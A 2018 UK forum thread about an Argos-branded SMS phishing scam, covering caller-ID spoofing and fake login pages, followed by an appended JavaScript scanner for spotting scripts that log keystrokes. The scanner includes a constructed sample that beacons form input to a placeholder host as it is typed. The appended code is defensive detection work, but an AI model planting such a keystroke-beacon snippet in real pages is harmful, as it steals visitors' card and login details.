Argos refund!, phishing scam

Sat, 3 Feb 2018 - 08:48
Post #1
Member Group: Members Posts: 882 Joined: 7 Nov 2004 Member No.: 1,847
Had a text from Argos (it stacked under Argos, along with the "your order is ready for collection" texts, which is a bit odd...)

Apparently, I have a refund due of £180! Obvious scam, as if Argos ever sell anything for £180, why didn't they put £179.99 or something?*

The link takes me to a page that looks exactly like the Argos log-in (except none of the hot links to store finder etc. work), and when I logged in, somehow guessing Ivor.Biggun's password, I am asked to enter card numbers, security code, mother's maiden name, address, DOB...

Do people seriously fall for this?? I suppose 1 in 1000 would do nicely.

On a serious note, why did it stack up with kosher Argos texts, is there a sender flag that they are spoofing in an SMS message?

* The one from the DVLA last week was much more believable, my refund is £48.73 or something, I wonder how long it will take to come? (They wanted my bank account number, card security number and my mother's maiden name too, seems a bit OTT when they always refund by cheque, in the hope that you will be unable to find a "bank" that is still open...)

This post has been edited by facade: Sat, 3 Feb 2018 - 08:50

Sat, 3 Feb 2018 - 08:56
Post #2
Member Group: Members Posts: 41,505 Joined: 25 Aug 2011 From: Planet Earth Member No.: 49,223
> ...and when I logged in, somehow guessing Ivor.Biggun's password,

I usually leave choice words too but I suspect the humour will be lost on the recipient. (I can picture them frantically trying to logon as Ivor)

Sat, 3 Feb 2018 - 09:05
Post #3
Member Group: Members Posts: 4,126 Joined: 31 Jan 2018 Member No.: 96,238
Is it illegal to provide the details of parking company bank accounts along with their directors' details?

Sat, 3 Feb 2018 - 09:05
Post #4
Member Group: Members Posts: 882 Joined: 7 Nov 2004 Member No.: 1,847
I wouldn't ever have clicked the links on the PC (probably Kaspersky would have stopped me, along with passing my every keystroke to Russia...)
But on my ancient iPhone 4, I'm never going to do anything secure or plug it into the PC, and I was curious....

Sat, 3 Feb 2018 - 10:07
Post #5
Webmaster Group: Root Admin Posts: 8,205 Joined: 30 Mar 2003 From: Wokingham, UK Member No.: 2
> On a serious note, why did it stack up with kosher Argos texts, is there a sender flag that they are spoofing in an SMS message?

All they have to do is spoof the Caller ID so that it matches Argos' - it's trivial. There's no authentication built in to SMS messaging; it was designed in more innocent times, and certainly nobody imagined it being used for critical purposes such as 2FA.

> I usually leave choice words too but I suspect the humour will be lost on the recipient. (I can picture them frantically trying to logon as Ivor)

I doubt they care, or even notice as exploitation of the information is doubtless automated. Providing obviously bogus details may even help them; there's a school of thought that phishing emails are deliberately made obvious to screen out the people who won't fall for subsequent steps in the scam, and so concentrate the pool of victims.

Regards,
Fredd

Sat, 3 Feb 2018 - 10:15
Post #6
Member Group: Members Posts: 25,726 Joined: 28 Jun 2010 From: Area 51 Member No.: 38,559
> ....... Providing obviously bogus details may even help them; there's a school of thought that phishing emails are deliberately made obvious to screen out the people who won't fall for subsequent steps in the scam, and so concentrate the pool of victims.

It's certainly true the other way, even with begging emails let alone phishing. Be seen as gullible, earmarked as one of the sheep to be sheared.

Sat, 3 Feb 2018 - 10:17
Post #7
Member Group: Members Posts: 1,333 Joined: 28 Mar 2014 From: Corby Member No.: 69,758
> Do people seriously fall for this?? I suppose 1 in 1000 would do nicely.

A colleague's wife did this, except didn't hit enter. DOB, NI, credit card, bank account, everything. There were fears that logging took place on data entry (as opposed to when you hit enter) but so far nothing has been stolen.

Sat, 3 Feb 2018 - 12:27
Post #8
Member Group: Members Posts: 38,006 Joined: 3 Dec 2010 Member No.: 42,618
In the past I've found these websites are hosted on a hacked legitimate website, and if you notify the owner of the legitimate website they take it down pretty quickly.

Sat, 3 Feb 2018 - 17:32
Post #9
Member Group: Members Posts: 28,931 Joined: 29 Nov 2005 Member No.: 4,323
> > Do people seriously fall for this?? I suppose 1 in 1000 would do nicely.
>
> A colleague's wife did this, except didn't hit enter. DOB, NI, credit card, bank account, everything. There were fears that logging took place on data entry (as opposed to when you hit enter) but so far nothing has been stolen.

Stay alert on it, it is a valid fear. JavaScript can send back your typing in a web page on the fly.

Sun, 4 Feb 2018 - 11:33
Post #10
Member Group: Members Posts: 1,333 Joined: 28 Mar 2014 From: Corby Member No.: 69,758
> > > Do people seriously fall for this?? I suppose 1 in 1000 would do nicely.
> >
> > A colleague's wife did this, except didn't hit enter. DOB, NI, credit card, bank account, everything. There were fears that logging took place on data entry (as opposed to when you hit enter) but so far nothing has been stolen.
>
> Stay alert on it, it is a valid fear. JavaScript can send back your typing in a web page on the fly.

Indeed, the only reason I know about this was because the worried colleague wanted me to look into the webpage to see what was happening but unfortunately it had been taken down before I had the chance.
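
Added example, not part of the thread: a heuristic way to do the check the last two posts describe, scanning a saved copy of a page's source for script that reacts to field input and also makes a network call, which is what "logging on data entry" looks like. Both sample pages, the `collector.example` host and the function names are constructed for illustration.

```javascript
// Added example: heuristic scan of saved page source; plain regexes, so
// obfuscated or externally loaded scripts are out of scope (assumption).
const KEY_EVENTS = ["keydown", "keyup", "keypress", "input", "change", "blur"];
const SINKS = [
  ["fetch", /\bfetch\s*\(/],
  ["XMLHttpRequest", /\bnew\s+XMLHttpRequest\b/],
  ["sendBeacon", /\.sendBeacon\s*\(/],
  ["WebSocket", /\bnew\s+WebSocket\b/],
  ["image beacon", /\bnew\s+Image\b[\s\S]*?\.src\s*=/],
];
// Bodies of inline <script> blocks.
function inlineScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  return [...html.matchAll(re)].map((m) => m[1]).filter((js) => js.trim());
}
// Per-field events a script listens to: addEventListener, jQuery .on(), or .on<event> =.
function listenedEvents(js) {
  return KEY_EVENTS.filter((ev) =>
    new RegExp(`(addEventListener|\\.on)\\s*\\(\\s*['"]${ev}['"]|\\.on${ev}\\s*=`).test(js));
}
// Flag scripts that both listen on field events and contain a network call.
function findKeystrokeCapture(html) {
  const findings = [];
  inlineScripts(html).forEach((js, script) => {
    const events = listenedEvents(js);
    const sinks = SINKS.filter(([, re]) => re.test(js)).map(([name]) => name);
    if (events.length && sinks.length) findings.push({ script, events, sinks });
  });
  const inlineHandlers = (html.match(/\son(?:key(?:up|down|press)|input)\s*=/gi) || []).length;
  return { findings, inlineHandlers, suspicious: findings.length > 0 || inlineHandlers > 0 };
}
// Constructed sample: reports to a placeholder host on every input event.
const SAMPLE_LIVE = `<form action="/login"><input name="card"></form>
<script>
document.querySelector("input").addEventListener("input", function () {
  navigator.sendBeacon("https://collector.example/", "x");
});
</script>`;
// Constructed sample: network call only when the form is submitted.
const SAMPLE_SUBMIT = `<form id="f" action="/login"><input name="user"></form>
<script>
document.getElementById("f").addEventListener("submit", function () {
  fetch("/metrics", { method: "POST" });
});
</script>`;
console.log(findKeystrokeCapture(SAMPLE_LIVE), findKeystrokeCapture(SAMPLE_SUBMIT));
```

A clean result only covers inline, unobfuscated script, so it narrows the question rather than settling it.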